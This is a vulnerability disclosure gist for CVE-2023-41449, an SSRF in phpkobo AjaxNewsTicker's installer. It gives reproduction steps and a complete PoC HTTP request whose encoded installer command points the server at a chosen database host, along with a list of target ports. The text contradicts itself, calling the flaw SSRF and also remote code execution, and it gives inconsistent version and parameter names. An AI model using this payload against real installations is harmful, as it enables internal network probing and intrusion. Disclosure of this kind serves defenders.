Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save RNPG/c1ae240f2acec138132aa64ce3faa2e0 to your computer and use it in GitHub Desktop.
Save RNPG/c1ae240f2acec138132aa64ce3faa2e0 to your computer and use it in GitHub Desktop.
CVE-2023-41449
Vulnerability Type: Server-Side Request Forgery (SSRF) Vulnerability
Vendor of Product: phpkobo
Affected Product Code Base: AjaxNewsTicker
Product Version: 1.05
Description: An issue in phpkobo AjaxNewsTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted payload to the reque parameter.
Attack Vectors: To exploit this vulnerability, the attacker only needs to inject his/her malicious command/payloads in to the vulnerable parameter and gets the response of command/payload from the server.
Attack Type: Remote
Payload: [139, 143, 443, 445, 993, 995, 1723]
Assigned CVE-ID: CVE-2023-41449
Discoverer: Alireza AmirHeydari, Raspina Net Pars Group (RNPG Ltd.)
Steps To Reproduce
1. Browse the the following URL: https://<target.xyz>/ntic/install/index.php?_be=1
2. You can inject your malicious payloads in to the vulnerable parameter and gets the response of payload from the server.
#PoC
GET /ntic/install/index.php?_be=1&requ=%7B%22cmd%22%3A%22goto_page5%22%2C%22form%22%3A%7B%22db-hostname%22%3A%22127.0.0.1%22%2C%22db-database%22%3A%22test%22%2C%22db-username%22%3A%22root%22%2C%22db-password%22%3A%22test%22%2C%22db-tbl-prefix%22%3A%22ntic_%22%7D%2C%22wdata%22%3A%22%7B%5C%22start%5C%22%3A%7B%7D%2C%5C%22permcheck%5C%22%3A%7B%7D%2C%5C%22personal%5C%22%3A%7B%5C%22first_name%5C%22%3A%5C%22%5C%22%2C%5C%22last_name%5C%22%3A%5C%22%5C%22%2C%5C%22email%5C%22%3A%5C%22%5C%22%2C%5C%22time_zone%5C%22%3A%5C%22UTC%5C%22%7D%2C%5C%22dbsetup%5C%22%3A%7B%5C%22db-hostname%5C%22%3A%5C%22127.0.0.1%5C%22%2C%5C%22db-database%5C%22%3A%5C%22test%5C%22%2C%5C%22db-username%5C%22%3A%5C%22root%5C%22%2C%5C%22db-password%5C%22%3A%5C%22test%5C%22%2C%5C%22db-tbl-prefix%5C%22%3A%5C%22ntic_%5C%22%7D%7D%22%7D HTTP/1.1
Host: target.xyz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://target.xyz
Connection: close
Referer: http://target.xyz/ntic/install/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment